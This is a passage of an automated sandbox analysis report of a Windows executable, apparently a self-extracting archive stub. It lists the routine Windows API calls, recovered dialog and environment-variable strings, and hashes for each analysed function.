                                                                                              • Instruction Fuzzy Hash: 5611E7B1604719AFD3224F7AAC84A97FBECFB55344F50482EF6D6C7200DA7069508B60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 003112F6: GetDlgItem.USER32(00000000,00003021), ref: 0031133A
                                                                                                • Part of subcall function 003112F6: SetWindowTextW.USER32(00000000,003445F4), ref: 00311350
                                                                                              • EndDialog.USER32(?,00000001), ref: 0032C4AE
                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000200), ref: 0032C4C6
                                                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 0032C4F4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogWindow
                                                                                              • String ID: GETPASSWORD1
                                                                                              • API String ID: 445417207-3292211884
                                                                                              • Opcode ID: eb49558c4a951bb5bc16ea809e73e6030d5a676c2fc7527c7e14867c224d95c6
                                                                                              • Instruction ID: 8c6ac21c3652311772690440d0abaf92dd8634cb348201dd223ecb72edc7afd9
                                                                                              • Opcode Fuzzy Hash: eb49558c4a951bb5bc16ea809e73e6030d5a676c2fc7527c7e14867c224d95c6
                                                                                              • Instruction Fuzzy Hash: B611087291013876DB376A79BC99FFF376CEB45714F010421FB05F6480C27499429660
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                              • API String ID: 0-56093855
                                                                                              • Opcode ID: 0fa0c3c1f0ff36c8e1e9ba612311f83fc10a89bfb6dd6a7e7f03446b6a88b34d
                                                                                              • Instruction ID: 51478b6fc1e3b05bfcbc40fd6a6255bd6c52c29622e8584582adb41070234b97
                                                                                              • Opcode Fuzzy Hash: 0fa0c3c1f0ff36c8e1e9ba612311f83fc10a89bfb6dd6a7e7f03446b6a88b34d
                                                                                              • Instruction Fuzzy Hash: E20171B1604765EFD7234F69FC49A963FECFB05395F010125F90A87270D2B19890EBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 0031495C
                                                                                                • Part of subcall function 0032FD1D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0032FD29
                                                                                                • Part of subcall function 0032FD1D: ___delayLoadHelper2@8.DELAYIMP ref: 0032FD4F
                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 00314967
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Xinvalid_argumentstd::_$Helper2@8Load___delaystd::invalid_argument::invalid_argument
                                                                                              • String ID: string too long$vector too long
                                                                                              • API String ID: 2355824318-1617939282
                                                                                              • Opcode ID: 5dceaeb8ef23ea4168d2ac290921857fc64c7ef8fc5f903534e4a9490e0944e0
                                                                                              • Instruction ID: 687ca0c5f4fe9db92959cf255efa016494eab81774957085bf29df31bae8db2f
                                                                                              • Opcode Fuzzy Hash: 5dceaeb8ef23ea4168d2ac290921857fc64c7ef8fc5f903534e4a9490e0944e0
                                                                                              • Instruction Fuzzy Hash: C8F0A0712003146B872AAF59FC45C8BB3EDEF89B50321092AFA45DB606D7B0F9408BF1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0032ED44
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0032ED80
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentVariable
                                                                                              • String ID: sfxcmd$sfxpar
                                                                                              • API String ID: 1431749950-3493335439
                                                                                              • Opcode ID: b0dfd80a5cb5f055e5ecc193712f075aebc00f4986dcab78f13dc8b2947f2f17
                                                                                              • Instruction ID: ced2e6e777d8821b7a3a22a5740facc6e6416cdc2b0c1d67a7cbacf48da85c6d
                                                                                              • Opcode Fuzzy Hash: b0dfd80a5cb5f055e5ecc193712f075aebc00f4986dcab78f13dc8b2947f2f17
                                                                                              • Instruction Fuzzy Hash: 55F037755012346BDB232B94AD07AEA769C9F26B41B000061FD4559056EA609980D6B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: __alldvrm$_strrchr
                                                                                              • String ID:
                                                                                              • API String ID: 1036877536-0
                                                                                              • Opcode ID: afb2700922330d6a2a5e5337cc0ba606ce23cf73aa61dbbfb2679083630104d7
                                                                                              • Instruction ID: 7586566faa2cdbbe8afbda4a21726ee4bc88cf118de9229432dde093613db28a
                                                                                              • Opcode Fuzzy Hash: afb2700922330d6a2a5e5337cc0ba606ce23cf73aa61dbbfb2679083630104d7
                                                                                              • Instruction Fuzzy Hash: 40A13672A04B869FDB27CF18C8E1BAEBBE5EF61310F19416DE4D59B281C6388D41C752
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00318D5C,?,?,?), ref: 0031B7F3
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000800,?,00318D5C,?,?), ref: 0031B837
                                                                                              • SetFileTime.KERNEL32(?,00318AEC,?,00000000,?,00000800,?,00318D5C,?,?,?,?,?,?,?,?), ref: 0031B8B8
                                                                                              • CloseHandle.KERNEL32(?,?,00000800,?,00318D5C,?,?,?,?,?,?,?,?,?,?), ref: 0031B8BF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Create$CloseHandleTime
                                                                                              • String ID:
                                                                                              • API String ID: 2287278272-0
                                                                                              • Opcode ID: e373ddb5e5bd0b72eb70150452377477f06b3b9949d49634d267e1192934bb69
                                                                                              • Instruction ID: 110cab52e47a8c67ba208753fae1d9d4e88aa62f13608bcf720f51392ade6f94
                                                                                              • Opcode Fuzzy Hash: e373ddb5e5bd0b72eb70150452377477f06b3b9949d49634d267e1192934bb69
                                                                                              • Instruction Fuzzy Hash: 6641EE31248380AAE736DF24DC55BEBFBE8AF89740F04092DF5D1971D0D764AA88DB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 176396367-0
                                                                                              • Opcode ID: a2473fddc4e424a0ed1d8006408e1ce6225eaaa6facf7f018038794e31dd3408
                                                                                              • Instruction ID: 36645979c0b7659fe788b8660e8692e4543397e72fb34b2ca508b4aa7f865d32
                                                                                              • Opcode Fuzzy Hash: a2473fddc4e424a0ed1d8006408e1ce6225eaaa6facf7f018038794e31dd3408
                                                                                              • Instruction Fuzzy Hash: 0141C7719006295BCB569F689C499EEBBBCEF14310F040029FE45F7245DB70AD898BE0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00318532
                                                                                              • _wcslen.LIBCMT ref: 00318558
                                                                                              • _wcslen.LIBCMT ref: 003185EF
                                                                                              • _wcslen.LIBCMT ref: 00318657
                                                                                                • Part of subcall function 0031B966: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0031B991
                                                                                                • Part of subcall function 0031B41F: RemoveDirectoryW.KERNEL32(?,?,?,00318649,?), ref: 0031B430
                                                                                                • Part of subcall function 0031B41F: RemoveDirectoryW.KERNEL32(?,?,?,00000800,?,00318649,?), ref: 0031B45E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$DirectoryRemove$CloseFind
                                                                                              • String ID:
                                                                                              • API String ID: 973666142-0
                                                                                              • Opcode ID: 13c4833921830cc24cf7045191f17a435417e1473527d55b164f376317025a4e
                                                                                              • Instruction ID: b40d65b3b2afabff5e8f32b169caa13d9757dd96540edb550428929f653cfa2f
                                                                                              • Opcode Fuzzy Hash: 13c4833921830cc24cf7045191f17a435417e1473527d55b164f376317025a4e
                                                                                              • Instruction Fuzzy Hash: 3A310672800254AACF2BAF608C41BEE736AEF5D780F154465F945AB149EF70DEC48B94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0033A871,?,00000000,?,00000001,?,?,00000001,0033A871,?), ref: 0033DB95
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0033DC1E
                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,003380B1,?), ref: 0033DC30
                                                                                              • __freea.LIBCMT ref: 0033DC39
                                                                                                • Part of subcall function 0033A7FE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0033DBEC,00000000,?,003380B1,?,00000008,?,0033A871,?,?,?), ref: 0033A830
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                              • String ID:
                                                                                              • API String ID: 2652629310-0
                                                                                              • Opcode ID: dc4e9b884caf96f2f17235508c11bd76435e096cf1978cebb1944f876bbecec9
                                                                                              • Instruction ID: b06f7448df78924e477f930693304ea5093dbe1ee62876d3ebb9c9798d3827ff
                                                                                              • Opcode Fuzzy Hash: dc4e9b884caf96f2f17235508c11bd76435e096cf1978cebb1944f876bbecec9
                                                                                              • Instruction Fuzzy Hash: 06319271A1020AABDF269F64ECC5EAE7BA9EF44710F064268FC04DB150E735DD90CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000020,?), ref: 00318713
                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 0031871A
                                                                                              • GetLastError.KERNEL32 ref: 00318759
                                                                                              • CloseHandle.KERNEL32(?), ref: 00318768
                                                                                              Similarity
                                                                                              • API ID: Process$CloseCurrentErrorHandleLastOpenToken
                                                                                              • String ID:
                                                                                              • API String ID: 2767541406-0
                                                                                              • Opcode ID: c09dc30cc0ea66dcab74474492cfe44b52b2ae7da60a1589264d619b87aa7367
                                                                                              • Instruction ID: 77268686f27eddda08f1d33064924cf16ec7ed3e8d8d3d2e612dbc792c297c40
                                                                                              • Opcode Fuzzy Hash: c09dc30cc0ea66dcab74474492cfe44b52b2ae7da60a1589264d619b87aa7367
                                                                                              • Instruction Fuzzy Hash: 110119B5500209AFEB269FA0DD89FAEBB7CAB04744F204425B901E1190EB71DE94AA71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 0032B676
                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0032B685
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0032B693
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0032B6A1
                                                                                              Similarity
                                                                                              • API ID: CapsDevice$Release
                                                                                              • String ID:
                                                                                              • API String ID: 1035833867-0
                                                                                              • Opcode ID: 481dc28eaafd3cf659d1c97e4b32932adc263061da80b8220929bf77ce1dc4cb
                                                                                              • Instruction ID: 24e2b6e0319a4e352b2b94b03ce79c63571211a50ff5b78eaf68a7b1b2e93590
                                                                                              • Opcode Fuzzy Hash: 481dc28eaafd3cf659d1c97e4b32932adc263061da80b8220929bf77ce1dc4cb
                                                                                              • Instruction Fuzzy Hash: 30E0EC72986F64ABD7361BA2BC1DB9A7F5CFB19713F450105F609962A0CAF044808FD1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0032B6A9: GetDC.USER32(00000000), ref: 0032B6AD
                                                                                                • Part of subcall function 0032B6A9: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0032B6B8
                                                                                                • Part of subcall function 0032B6A9: ReleaseDC.USER32(00000000,00000000), ref: 0032B6C3
                                                                                              • GetObjectW.GDI32(?,00000018,?), ref: 0032B84C
                                                                                                • Part of subcall function 0032BADE: GetDC.USER32(00000000), ref: 0032BAE7
                                                                                                • Part of subcall function 0032BADE: GetObjectW.GDI32(?,00000018,?), ref: 0032BB16
                                                                                                • Part of subcall function 0032BADE: ReleaseDC.USER32(00000000,?), ref: 0032BBAE
                                                                                              Similarity
                                                                                              • API ID: ObjectRelease$CapsDevice
                                                                                              • String ID: (
                                                                                              • API String ID: 1061551593-3887548279
                                                                                              • Opcode ID: 8ac0bb8220b98f715a8eaead7b40d1d93051868f93f546f3f41a9db070f43be1
                                                                                              • Instruction ID: aa03e07c64483a5dcb3b43b7fa7d7ed0bde0376823d9090c3ef05806d72d72b6
                                                                                              • Opcode Fuzzy Hash: 8ac0bb8220b98f715a8eaead7b40d1d93051868f93f546f3f41a9db070f43be1
                                                                                              • Instruction Fuzzy Hash: D291FF75608754AFD622DF25D844A2BBBFCFF89700F00492EF59AD7260DB70A841CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 003180C3
                                                                                                • Part of subcall function 00321907: _wcslen.LIBCMT ref: 0032190D
                                                                                                • Part of subcall function 0031B966: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0031B991
                                                                                              • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00318262
                                                                                                • Part of subcall function 0031B8E6: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0031B5B5,?,?,?,0031B405,?,00000001,00000000,?,?), ref: 0031B8FA
                                                                                                • Part of subcall function 0031B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0031B5B5,?,?,?,0031B405,?,00000001,00000000,?,?), ref: 0031B92B
                                                                                              Similarity
                                                                                              • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                              • String ID: :
                                                                                              • API String ID: 3226429890-336475711
                                                                                              • Opcode ID: a22f28cc18c82ca87bebe227b4609c20421cb30aac30647965c5fb1fd8f99ca5
                                                                                              • Instruction ID: 64949ccfe43e48f553f9c23a0a1f71216cfe4b636efa37a198990078aee8db47
                                                                                              • Opcode Fuzzy Hash: a22f28cc18c82ca87bebe227b4609c20421cb30aac30647965c5fb1fd8f99ca5
                                                                                              • Instruction Fuzzy Hash: 4C514671800658AADB2BEB50CD56EEEB37DAF49300F1044A5B605AB092DB745FCACF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: }
                                                                                              • API String ID: 176396367-4239843852
                                                                                              • Opcode ID: 369cb429bc71c3dd78503259f40e84b399a41057d66855fc2f8ca3c3f5412808
                                                                                              • Instruction ID: 9ee7423cca82941246073d02983b1224da77d90af9710d91bb2d4fe13fd8e921
                                                                                              • Opcode Fuzzy Hash: 369cb429bc71c3dd78503259f40e84b399a41057d66855fc2f8ca3c3f5412808
                                                                                              • Instruction Fuzzy Hash: 572105729243265ED733EB68E845A6FB3ECDF85750F05142AF540CB141EB71ED488BA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 0031CDE7
                                                                                                • Part of subcall function 00314A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00314A33
                                                                                              Similarity
                                                                                              • API ID: __vswprintf_c_l_swprintf
                                                                                              • String ID: %c:\
                                                                                              • API String ID: 1543624204-3142399695
                                                                                              • Opcode ID: 782c90190cd345d89981b1cd79cd275cfe5a1de3829147817c2bbe38fe44e590
                                                                                              • Instruction ID: 9533cda0d7a52546ca5b8dfad9ec6384e795ae0ff8a1d50149aa42cd5cf4061a
                                                                                              • Opcode Fuzzy Hash: 782c90190cd345d89981b1cd79cd275cfe5a1de3829147817c2bbe38fe44e590
                                                                                              • Instruction Fuzzy Hash: BA016D6309431175DA3B6B799C82DE7A7ACDF9D371B40841AF444CB081EA30D490C2B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00330DBD
• ___raise_securityfailure.LIBCMT ref: 00330EA5
Strings
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: FeaturePresentProcessor___raise_securityfailure
• String ID: x=7
• API String ID: 3761405300-2012613963
• Opcode ID: a2b6e37a66a8c38499abacc62d756baea9f1e429d5735ffbc9d4144eca3ee52d
• Instruction ID: 14ba8e26713421a4a263a617396d530ebbe8b1770eaf06ce7a1a7aa5452417ea
• Opcode Fuzzy Hash: a2b6e37a66a8c38499abacc62d756baea9f1e429d5735ffbc9d4144eca3ee52d
• Instruction Fuzzy Hash: B12194B6540300EED726CF59E9966907BE8EB48715F10502EE9488BAB0D3B1AAC1EF45
Uniqueness

Uniqueness Score: -1.00%

APIs
• IsWindowVisible.USER32(00020486), ref: 0032EF2A
• DialogBoxParamW.USER32(GETPASSWORD1,00020486,0032C460,?), ref: 0032EF65
Strings
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: DialogParamVisibleWindow
• String ID: GETPASSWORD1
• API String ID: 3157717868-3292211884
• Opcode ID: 963970c68648768c4eef1e97e3b658c61329fdf949e471e4e77162e4a75e60f7
• Instruction ID: fb33af309896f77188fc72f29119c0801172fc7619329ad0b2e7777630e43b36
• Opcode Fuzzy Hash: 963970c68648768c4eef1e97e3b658c61329fdf949e471e4e77162e4a75e60f7
• Instruction Fuzzy Hash: 5311E535254364BFDB279BA4AC53BEA379CAB05741F168121F845A7192C6A06884CBB2
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateThread.KERNEL32(00000000,00010000,00322480,?,00000000,00000000), ref: 00322362
• SetThreadPriority.KERNEL32(?,00000000), ref: 003223A9
  • Part of subcall function 003176E9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00317707
Strings
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: Thread$CreatePriority__vswprintf_c_l
• String ID: CreateThread failed
• API String ID: 2655393344-3849766595
• Opcode ID: c8091a3df3e1d3243dbec249b52c5d3e2f4e98932021dc9be8d07be18ce86ee9
• Instruction ID: 2aef43894917469c80727a86a66f7c6ccf807f741373836c4db759a37de8ebfe
• Opcode Fuzzy Hash: c8091a3df3e1d3243dbec249b52c5d3e2f4e98932021dc9be8d07be18ce86ee9
• Instruction Fuzzy Hash: 4701DBBA2447167FD327AF54AC42FA3B3A8EB44752F11012DFB429B1D0CEA168548620
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualQuery.KERNEL32(80000000,0032F774,0000001C,0032F969,00000000,?,?,?,?,?,?,?,0032F774,00000004,00373D24,0032F9F9), ref: 0032F840
• GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0032F774,00000004,00373D24,0032F9F9), ref: 0032F85B
Strings
Memory Dump Source
• Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
• Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_310000_work.jbxd
Similarity
• API ID: InfoQuerySystemVirtual
• String ID: D
• API String ID: 401686933-2746444292
• Opcode ID: 5c7af62a2cf83464ab205a6251346e1ea269c18ddcd59b4a8928a81c29393d17
• Instruction ID: 77380d2a8722f35858946c96f3e7d906e6be78c6a0da3d50e82849b9b375681c
• Opcode Fuzzy Hash: 5c7af62a2cf83464ab205a6251346e1ea269c18ddcd59b4a8928a81c29393d17
